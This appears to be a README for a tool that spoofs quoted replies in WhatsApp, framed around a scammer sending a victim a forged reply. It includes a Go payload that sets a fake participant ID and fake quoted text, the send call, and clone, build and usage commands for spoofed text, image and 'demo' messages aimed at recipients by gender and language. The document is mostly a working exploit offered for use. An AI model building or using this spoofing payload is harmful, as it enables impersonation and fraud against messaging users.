The problem

Users: UserA, UserB; UserA is not known by UserB

UserA (SCAMMER) sends a spoofed messages to UserB in response to a message that UserB did never send

Spoofed message payload:

msg := &waProto.Message{
    ExtendedTextMessage: &waProto.ExtendedTextMessage{
        Text: proto.String("Some text"),
        ContextInfo: &waProto.ContextInfo{
            StanzaId:     proto.String("Some Random ID"), //Random ID
            Participant: proto.String("[email protected]"), //Spoofed user ID
            QuotedMessage: &waProto.Message{
                Conversation: proto.String("Some Spoofed text"), //QuotedMessage Spoofed text
            },
        },
    },
}

Send the Spoofed Payload:

resp, err := cli.SendMessage(context.Background(), chatID, msg) 
// chatID is the ID of the chat you want to send the message to, can be a group or the same number as the spoofed user ID

POC

Watch the video

Exploit

Clone the repository.

git clone https://github.com/AdibChiguer/wtsp-spoof.git

Install dependencies.

cd whats-spoofing
go mod download
go get 

Build

go build 

Running

./whats-spoofing

Usage

Retrieve Group Information

getgroup <jid>

List Groups

listgroups

Send Spoofed Reply

send-spoofed-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_text>|<text>

Send Spoofed Image Reply

send-spoofed-img-reply <chat_jid> <msgID:!|#ID> <spoofed_jid> <spoofed_file> <spoofed_text>|<text>

Send Spoofed Demo Message

send-spoofed-demo <toGender:boy|girl> <language:br|en> <chat_jid> <spoofed_jid>

Send Spoofed Demo Message with Image

send-spoofed-demo-img <toGender:boy|girl> <language:br|en> <spoofed_jid> <spoofed_img>